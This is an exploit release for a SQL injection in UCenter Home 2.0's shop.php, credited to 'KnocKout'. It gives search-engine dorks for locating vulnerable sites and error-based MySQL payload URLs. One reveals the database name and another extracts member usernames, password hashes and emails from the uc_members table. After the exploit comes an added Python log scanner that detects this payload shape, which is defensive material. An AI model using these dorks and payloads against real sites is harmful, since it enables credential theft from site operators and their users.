__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability Type : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
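
A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans web access-log lines for shop.php requests whose shopid value is not a plain integer and reports which markers of the error-based payload (information_schema, floor(rand(, group by, select) appear in it. The combined log format, the sample lines, the helper names and the assumption that a legitimate shopid is a bare integer are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (assumed; not taken from the advisory).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2011:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),'
    'concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.3 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 640',
    '198.51.100.4 - - [01/Jan/2011:10:00:11 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 100',
]

# Request line; the lazy match tolerates raw (unencoded) spaces inside the URL.
REQUEST = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+"')
# Markers of the error-based technique visible in the advisory's payload.
MARKERS = {
    "information_schema": re.compile(r"information_schema", re.I),
    "floor(rand(": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group by": re.compile(r"group\s+by", re.I),
    "select": re.compile(r"\bselect\b", re.I),
}

def inspect_line(line):
    """Return (shopid_value, matched_markers) for a suspicious shop.php hit, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    # parse_qs URL-decodes the value, so %20 / %27 encodings do not hide the payload.
    values = parse_qs(url.query, keep_blank_values=True).get("shopid", [])
    for value in values:
        if not re.fullmatch(r"\d+", value):  # assumption: shopid is a bare integer
            hits = [name for name, rx in MARKERS.items() if rx.search(value)]
            return value, hits
    return None

def scan(lines):
    """Return (line_index, shopid_value, markers) for every flagged line."""
    return [(i, *r) for i, l in enumerate(lines) if (r := inspect_line(l))]

if __name__ == "__main__":
    for idx, value, hits in scan(SAMPLE_LOG):
        print(f"line {idx}: shopid={value!r} markers={hits}")
```

A non-integer shopid with no markers (the third sample line) is still reported, since probing usually precedes the full payload.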